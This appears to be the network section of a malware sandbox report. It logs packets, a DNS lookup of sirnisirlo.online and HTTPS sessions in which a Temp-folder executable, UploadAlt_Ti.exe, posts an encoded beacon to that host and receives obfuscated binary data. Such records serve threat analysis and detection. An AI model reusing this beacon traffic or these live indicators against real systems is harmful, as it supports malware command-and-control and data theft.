Nov 14, 2024 19:57:09.991102934 CET	443	49263	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:09.991178036 CET	49263	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:09.991554976 CET	49263	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:09.991581917 CET	443	49263	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:10.926961899 CET	443	49263	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:10.927041054 CET	49263	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:10.928896904 CET	49263	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:10.928908110 CET	443	49263	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:10.929162979 CET	443	49263	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:10.930219889 CET	49263	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:10.930399895 CET	49263	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:10.930428982 CET	443	49263	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:10.930519104 CET	49263	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:10.930547953 CET	443	49263	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:10.930649042 CET	49263	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:10.930676937 CET	443	49263	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:10.930797100 CET	49263	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:10.930813074 CET	443	49263	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:12.044434071 CET	443	49263	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:12.044507980 CET	443	49263	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:12.044694901 CET	49263	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:12.044694901 CET	49263	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:12.044738054 CET	443	49263	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:12.044760942 CET	49263	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:12.044769049 CET	443	49263	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:12.062545061 CET	49264	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:12.062644958 CET	443	49264	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:12.062786102 CET	49264	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:12.063030958 CET	49264	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:12.063071966 CET	443	49264	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:12.681091070 CET	443	49264	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:12.682250977 CET	49264	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:12.689832926 CET	49264	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:12.689884901 CET	443	49264	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:12.690083981 CET	443	49264	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:12.690874100 CET	49264	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:12.690874100 CET	49264	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:12.690916061 CET	443	49264	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:13.085338116 CET	443	49264	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:13.085397959 CET	443	49264	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:13.085488081 CET	49264	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:13.086401939 CET	49264	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:13.086456060 CET	443	49264	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:13.086486101 CET	49264	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:13.086503983 CET	443	49264	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:43.478476048 CET	49265	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:43.478521109 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:43.478598118 CET	49265	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:43.479680061 CET	49265	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:43.479695082 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:44.180915117 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:44.181061029 CET	49265	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:44.182369947 CET	49265	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:44.182404995 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:44.182642937 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:44.230405092 CET	49265	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:44.233500004 CET	49265	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:44.233556032 CET	49265	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:44.233634949 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.084922075 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.084960938 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.084995031 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.085015059 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.085037947 CET	49265	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:45.085068941 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.085098982 CET	49265	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:45.085227013 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.085254908 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.085377932 CET	49265	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:45.085448027 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.085505009 CET	49265	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:45.090126038 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.136791945 CET	49265	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:45.136867046 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.183564901 CET	49265	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:45.204189062 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.234988928 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.235033989 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.235152960 CET	49265	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:45.235239029 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.235333920 CET	49265	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:45.235730886 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.235774040 CET	49265	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:45.235790968 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.236711979 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.236772060 CET	49265	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:45.236787081 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.277446985 CET	49265	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:45.323573112 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.354753017 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.354784966 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.354957104 CET	49265	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:45.355026007 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.355084896 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.355108976 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.355127096 CET	49265	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:45.355127096 CET	49265	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:45.355149984 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.355195999 CET	49265	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:45.356137991 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.356200933 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.356220961 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.356244087 CET	49265	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:45.356260061 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.356316090 CET	49265	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:45.473472118 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.474077940 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.474101067 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.474131107 CET	49265	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:45.474210978 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.474261045 CET	49265	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:45.474589109 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.475600958 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.475629091 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.475655079 CET	49265	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:45.475656986 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.475667953 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.475739002 CET	49265	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:45.475934982 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.475994110 CET	49265	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:45.476007938 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.476035118 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.476089001 CET	49265	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:45.476157904 CET	49265	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:45.476197004 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.476222038 CET	49265	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:45.476237059 CET	443	49265	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.544794083 CET	49266	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:45.544847965 CET	443	49266	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:45.544905901 CET	49266	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:45.545201063 CET	49266	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:45.545221090 CET	443	49266	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:46.191381931 CET	443	49266	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:46.191473961 CET	49266	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:46.192676067 CET	49266	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:46.192688942 CET	443	49266	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:46.193041086 CET	443	49266	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:46.194052935 CET	49266	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:46.194092035 CET	49266	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:46.194097042 CET	443	49266	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:46.600466013 CET	443	49266	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:46.600585938 CET	443	49266	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:46.600698948 CET	49266	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:46.601035118 CET	49266	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:46.601056099 CET	443	49266	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:46.601072073 CET	49266	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:46.601078033 CET	443	49266	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:46.669291973 CET	49267	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:46.669348955 CET	443	49267	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:46.669428110 CET	49267	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:46.669961929 CET	49267	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:46.669991970 CET	443	49267	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:47.567291975 CET	443	49267	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:47.567375898 CET	49267	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:47.568995953 CET	49267	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:47.569055080 CET	443	49267	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:47.569432020 CET	443	49267	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:47.570429087 CET	49267	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:47.570481062 CET	49267	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:47.570494890 CET	443	49267	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:48.209877014 CET	443	49267	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:48.209942102 CET	443	49267	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:48.210033894 CET	49267	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:48.210186005 CET	49267	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:48.210210085 CET	443	49267	188.114.97.3	192.168.2.7
Nov 14, 2024 19:57:48.210227013 CET	49267	443	192.168.2.7	188.114.97.3
Nov 14, 2024 19:57:48.210237026 CET	443	49267	188.114.97.3	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 14, 2024 19:56:20.999033928 CET	53	61849	1.1.1.1	192.168.2.7
Nov 14, 2024 19:56:26.253819942 CET	53	49562	1.1.1.1	192.168.2.7
Nov 14, 2024 19:56:52.405152082 CET	53071	53	192.168.2.7	1.1.1.1
Nov 14, 2024 19:56:52.446156979 CET	53	53071	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 14, 2024 19:56:52.405152082 CET	192.168.2.7	1.1.1.1	0x8fe0	Standard query (0)	sirnisirlo.online	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 14, 2024 19:56:52.446156979 CET	1.1.1.1	192.168.2.7	0x8fe0	No error (0)	sirnisirlo.online		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 14, 2024 19:56:52.446156979 CET	1.1.1.1	192.168.2.7	0x8fe0	No error (0)	sirnisirlo.online		188.114.96.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

sirnisirlo.online

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49180	188.114.97.3	443	2176	C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 18:56:53 UTC	372	OUT	POST /book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Content-Length: 96 Host: sirnisirlo.online
2024-11-14 18:56:53 UTC	96	OUT	Data Raw: 00 00 00 00 00 00 00 00 03 00 00 00 fd ff ff ff 92 00 00 00 00 00 00 00 00 00 00 2d 00 00 00 fe ff ff ff 97 00 a0 a0 a0 ff ff d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: -$9e146be9-c76a-4720-bcdb-53011b87bd06
2024-11-14 18:56:54 UTC	800	IN	HTTP/1.1 200 OK Date: Thu, 14 Nov 2024 18:56:53 GMT Transfer-Encoding: chunked Connection: close gm: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qq7PgGGnnJ05aFuXV0fu5jEQ3bx13Jh9cdpFV4YDYT45Pkp7JSSkX9sAOEsOi384GOEhob%2FA1EuIylLqCYQxnhVHWwYXIRqanJdPJNpxdQg4F4KHbjdEcMNgMdwXMaHtIOG5gg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e29395f1c56798a-DEN alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=18987&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1104&delivery_rate=152629&cwnd=32&unsent_bytes=0&cid=a0f36174208192aa&ts=575&x=0"
2024-11-14 18:56:54 UTC	17	IN	Data Raw: 63 0d 0a 00 00 00 00 00 00 00 00 6a 7a 00 00 0d 0a Data Ascii: cjz
2024-11-14 18:56:54 UTC	1369	IN	Data Raw: 33 37 63 61 0d 0a c8 dd 6d 32 14 00 4c 0a 60 03 01 00 19 1d 0e 1f 19 41 08 a2 bf bf 60 03 8a 08 23 72 9c 5a 99 86 00 10 00 0c 09 98 01 04 00 19 1d 0e 1f 19 41 04 a1 c4 c4 98 01 48 95 ae c0 e7 42 da ce 14 00 6b 0b 59 02 0c 00 19 1d 0e 1f 19 41 08 cb bf bf 59 02 8a 08 23 72 9c 5a 99 86 15 17 b9 b8 36 b4 3a b2 96 bb b0 36 10 00 b5 08 79 0f 04 00 19 1d 0e 1f 19 41 04 ec c4 c4 79 0f 8b c5 a3 15 78 1e a8 39 14 00 be 08 f8 08 0a 00 19 1d 0e 1f 19 41 08 08 bf bf f8 08 8a 08 23 72 9c 5a 99 86 26 b7 b3 b4 37 10 22 b0 3a b0 10 00 cf 07 4f 07 04 00 19 1d 0e 1f 19 41 04 08 c4 c4 4f 07 25 87 27 47 82 9f 2c 6b 10 00 24 0f 5d 00 04 00 19 1d 0e 1f 19 41 04 cb c4 c4 5d 00 5b cb 8f 2d fd d3 84 01 14 00 59 04 e9 07 05 00 19 1d 0e 1f 19 41 08 cb bf bf e9 07 8a 08 23 72 9c 5a Data Ascii: 37cam2L`A`#rZAHBkYAY#rZ6:6yAyx9A#rZ&7":OAO%'G,k$]A][-YA#rZ
2024-11-14 18:56:54 UTC	1369	IN	Data Raw: 3a 2e a7 33 33 b4 b1 b2 2e 98 1b 17 18 2e a7 ba 3a 36 b7 b7 b5 2e 28 39 b7 33 b4 36 b2 b9 2e a7 ba 3a 36 b7 b7 b5 2e 9c 99 9b 9a a1 23 23 18 1a 98 99 98 98 98 32 99 21 1c 1c a0 18 18 98 18 1a 21 19 a0 1b 1b 9b 1b 14 00 be 01 ba 0d 0a 00 19 1d 0e 1f 19 41 08 52 bf bf ba 0d 8a 08 23 72 9c 5a 99 86 38 b5 b1 b9 98 98 17 3a 3c 3a 14 00 02 03 7d 03 11 00 19 1d 0e 1f 19 41 08 08 bf bf 7d 03 8a 08 23 72 9c 5a 99 86 b1 34 39 b7 b6 b4 ba b6 af 31 39 b7 bb b9 b2 39 b9 14 00 09 04 4b 00 07 00 19 1d 0e 1f 19 41 08 ec bf bf 4b 00 8a 08 23 72 9c 5a 99 86 29 b2 b0 36 2b 27 a1 10 00 bd 04 6a 0d 04 00 19 1d 0e 1f 19 41 04 3b c4 c4 6a 0d d0 f7 00 81 71 ef 0b ad 14 00 1a 0e 7f 0a 0a 00 19 1d 0e 1f 19 41 08 3b bf bf 7f 0a 8a 08 23 72 9c 5a 99 86 b1 b7 37 33 b4 b3 af b2 3c 3a Data Ascii: :.33..:6.(936.:6.##2!!AR#rZ8:<:}A}#rZ49199KAK#rZ)6+'jA;jqA;#rZ73<:
2024-11-14 18:56:54 UTC	1369	IN	Data Raw: 05 29 02 08 00 19 1d 0e 1f 19 41 08 cb e3 e3 29 02 2d 18 97 ed 0c a0 82 d1 01 86 24 9b d2 d9 f3 20 10 00 30 0b 60 09 04 00 19 1d 0e 1f 19 41 04 9b c4 c4 60 09 76 31 4a 94 d5 2d 41 b8 10 00 cc 0d e7 08 04 00 19 1d 0e 1f 19 41 04 3b c4 c4 e7 08 e6 0d 49 2b 44 15 42 07 14 00 51 0c 3c 04 08 00 19 1d 0e 1f 19 41 08 a2 e3 e3 3c 04 81 dc 5b 0d 41 97 00 aa a8 42 e8 7b 9f ee 71 5b 10 00 fa 0d 82 0d 04 00 19 1d 0e 1f 19 41 04 08 c4 c4 82 0d e1 58 2d 69 42 a1 d3 40 10 00 e1 02 e7 01 04 00 19 1d 0e 1f 19 41 04 08 c4 c4 e7 01 8e c9 c4 57 2d 30 3a 7e 14 00 89 0d 35 0e 07 00 19 1d 0e 1f 19 41 08 ec bf bf 35 0e 8a 08 23 72 9c 5a 99 86 29 b2 b0 36 2b 27 a1 10 00 22 0f 78 04 04 00 19 1d 0e 1f 19 41 04 9b c4 c4 78 04 85 46 79 84 27 5e 72 a8 14 00 86 0a 11 0a 08 00 19 1d 0e Data Ascii: )A)-$ 0`A`v1J-AA;I+DBQ<A<[AB{q[AX-iB@AW-0:~5A5#rZ)6+'"xAxFy'^r
2024-11-14 18:56:54 UTC	1369	IN	Data Raw: 9c 99 99 18 1b 9a 98 9b 18 98 19 9b 98 9c 19 19 10 00 9a 04 91 06 04 00 19 1d 0e 1f 19 41 04 ec c4 c4 91 06 4d 4d 0d c3 be 96 06 ef 14 00 f0 01 30 03 08 00 19 1d 0e 1f 19 41 08 cb e3 e3 30 03 ce 18 c6 12 71 77 c6 fc e3 86 75 64 af 0e b7 0d 14 00 26 09 6d 06 12 00 19 1d 0e 1f 19 41 08 52 bf bf 6d 06 8a 08 23 72 9c 5a 99 86 33 b7 39 b6 34 b4 b9 3a b7 39 bc 17 b9 b8 36 b4 3a b2 14 00 be 04 62 0a 17 00 19 1d 0e 1f 19 41 08 a2 bf bf 62 0a 8a 08 23 72 9c 5a 99 86 33 b4 36 b2 af 3a 39 b0 37 b9 33 b2 39 af 3a 39 b0 b1 b2 17 3a 3c 3a 10 00 4f 08 f1 04 04 00 19 1d 0e 1f 19 41 04 9b c4 c4 f1 04 f1 f9 20 4e 53 e1 2b 62 14 00 89 06 96 0c 08 00 19 1d 0e 1f 19 41 08 08 bf bf 96 0c 8a 08 23 72 9c 5a 99 86 38 39 b7 33 b4 36 b2 b9 14 00 81 03 4b 0d 08 00 19 1d 0e 1f 19 41 Data Ascii: AMM0A0qwud&mARm#rZ394:96:bAb#rZ36:9739:9:<:OA NS+bA#rZ8936KA
2024-11-14 18:56:54 UTC	1369	IN	Data Raw: 8a 08 23 72 9c 5a 99 86 29 22 28 14 00 a7 03 fe 0a 08 00 19 1d 0e 1f 19 41 08 b7 e3 e3 fe 0a 75 87 45 c9 44 2e af a7 5d 19 f6 bf 9a 57 de 56 10 00 db 00 47 0c 04 00 19 1d 0e 1f 19 41 04 cb c4 c4 47 0c 6e 8a c2 b3 cc 92 c9 9f 14 00 5e 06 0f 0f 07 00 19 1d 0e 1f 19 41 08 08 bf bf 0f 0f 8a 08 23 72 9c 5a 99 86 a1 aa 29 29 a2 27 2a 10 00 0d 0a c1 0b 04 00 19 1d 0e 1f 19 41 04 9b c4 c4 c1 0b db e9 d6 61 79 f1 dd 4d 14 00 e5 05 86 0e 0e 00 19 1d 0e 1f 19 41 08 52 bf bf 86 0e 8a 08 23 72 9c 5a 99 86 b1 b7 b7 b5 b4 b2 b9 17 b9 b8 36 b4 3a b2 10 00 bb 02 54 0a 04 00 19 1d 0e 1f 19 41 04 cb c4 c4 54 0a a0 98 92 48 03 84 99 64 14 00 e8 04 33 07 04 00 19 1d 0e 1f 19 41 08 08 bf bf 33 07 8a 08 23 72 9c 5a 99 86 26 a7 a1 a5 14 00 1d 0a 8c 06 06 00 19 1d 0e 1f 19 41 08 Data Ascii: #rZ)"(AuED.]WVGAGn^A#rZ))'*AayMAR#rZ6:TATHd3A3#rZ&A
2024-11-14 18:56:54 UTC	1369	IN	Data Raw: 2d 57 9a c3 96 07 8c ef 5b 89 e3 b2 67 14 00 38 00 e2 0b 08 00 19 1d 0e 1f 19 41 08 52 bf bf e2 0b 8a 08 23 72 9c 5a 99 86 38 39 b7 33 b4 36 b2 b9 14 00 0d 0e 6a 0f 0b 00 19 1d 0e 1f 19 41 08 08 bf bf 6a 0f 8a 08 23 72 9c 5a 99 86 26 b7 b1 b0 36 10 a9 3a b0 3a b2 14 00 dd 01 f0 07 08 00 19 1d 0e 1f 19 41 08 ec e3 e3 f0 07 dd 40 13 8a 82 4d e7 2c f5 de a0 fc 5c 34 96 dd 14 00 76 0b f7 01 04 00 19 1d 0e 1f 19 41 08 08 bf bf f7 01 8a 08 23 72 9c 5a 99 86 26 a7 a1 a5 14 00 d9 09 f4 0d 23 00 19 1d 0e 1f 19 41 08 fb bf bf f4 0d 8a 08 23 72 9c 5a 99 86 32 b4 b9 b1 b7 39 32 b1 b0 37 b0 39 bc 2e 26 b7 b1 b0 36 10 a9 3a b7 39 b0 b3 b2 2e 36 b2 3b b2 36 32 31 14 00 58 05 34 01 08 00 19 1d 0e 1f 19 41 08 cb e3 e3 34 01 38 64 e3 05 19 0e 28 b5 11 fa 50 73 c7 77 59 44 Data Ascii: -W[g8AR#rZ8936jAj#rZ&6::A@M,\4vA#rZ&#A#rZ29279.&6:9.6;621X4A48d(PswYD
2024-11-14 18:56:54 UTC	1369	IN	Data Raw: 00 19 1d 0e 1f 19 41 04 fb c4 c4 d2 0c 0b 84 52 59 a9 9c 59 75 10 00 85 01 56 0f 04 00 19 1d 0e 1f 19 41 04 ec c4 c4 56 0f cf 5d 1e a8 7c 62 15 84 14 00 32 0a 46 02 06 00 19 1d 0e 1f 19 41 08 9b bf bf 46 02 8a 08 23 72 9c 5a 99 86 a3 ba b0 39 32 b0 14 00 ad 04 b3 0a 05 00 19 1d 0e 1f 19 41 08 08 bf bf b3 0a 8a 08 23 72 9c 5a 99 86 15 17 36 32 31 14 00 99 0f 69 04 05 00 19 1d 0e 1f 19 41 08 08 bf bf 69 04 8a 08 23 72 9c 5a 99 86 15 17 36 32 31 10 00 64 0d 94 04 04 00 19 1d 0e 1f 19 41 04 ec c4 c4 94 04 0a 4a 03 d6 b9 75 08 fa 14 00 36 0d 2d 08 0e 00 19 1d 0e 1f 19 41 08 b7 bf bf 2d 08 8a 08 23 72 9c 5a 99 86 36 b7 b3 b4 37 ba b9 b2 39 b9 17 3b 32 33 14 00 1b 0a 18 00 09 00 19 1d 0e 1f 19 41 08 3b bf bf 18 00 8a 08 23 72 9c 5a 99 86 28 39 b7 3a b7 37 2b 28 Data Ascii: ARYYuVAV]\|b2FAF#rZ92A#rZ621iAi#rZ621dAJu6-A-#rZ679;23A;#rZ(9:7+(
2024-11-14 18:56:54 UTC	1369	IN	Data Raw: 5a 99 86 a1 34 39 b7 b6 b2 14 00 96 03 70 07 0d 00 19 1d 0e 1f 19 41 08 cb bf bf 70 07 8a 08 23 72 9c 5a 99 86 26 b7 b1 b0 36 10 a9 3a b7 39 b0 b3 b2 10 00 1e 03 12 0f 04 00 19 1d 0e 1f 19 41 04 9b c4 c4 12 0f 20 5d ae 5c 83 a4 50 75 14 00 d5 09 a2 0e 08 00 19 1d 0e 1f 19 41 08 9b e3 e3 a2 0e 3e 89 04 ce 64 9d ac 84 16 17 b7 b8 ba e4 dd 75 14 00 72 0f bf 01 13 00 19 1d 0e 1f 19 41 08 ec bf bf bf 01 8a 08 23 72 9c 5a 99 86 38 b0 b9 b9 bb b7 39 32 b9 17 b2 37 b1 b6 b0 b9 3a b2 39 14 00 f0 0b 10 0a 2a 00 19 1d 0e 1f 19 41 08 cb bf bf 10 0a 8a 08 23 72 9c 5a 99 86 a7 ba 3a 36 b7 b7 b5 ab b4 37 a0 38 38 a1 36 b0 b9 b9 b4 b1 2e a0 38 38 22 b0 3a b0 2e 26 b7 b1 b0 36 2e a7 ba 3a 36 b7 b7 b5 14 00 b2 0c 8d 01 08 00 19 1d 0e 1f 19 41 08 cb e3 e3 8d 01 00 e4 f3 cb Data Ascii: Z49pAp#rZ&6:9A ]\PuA>durA#rZ8927:9*A#rZ:67886.88":.&6.:6A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
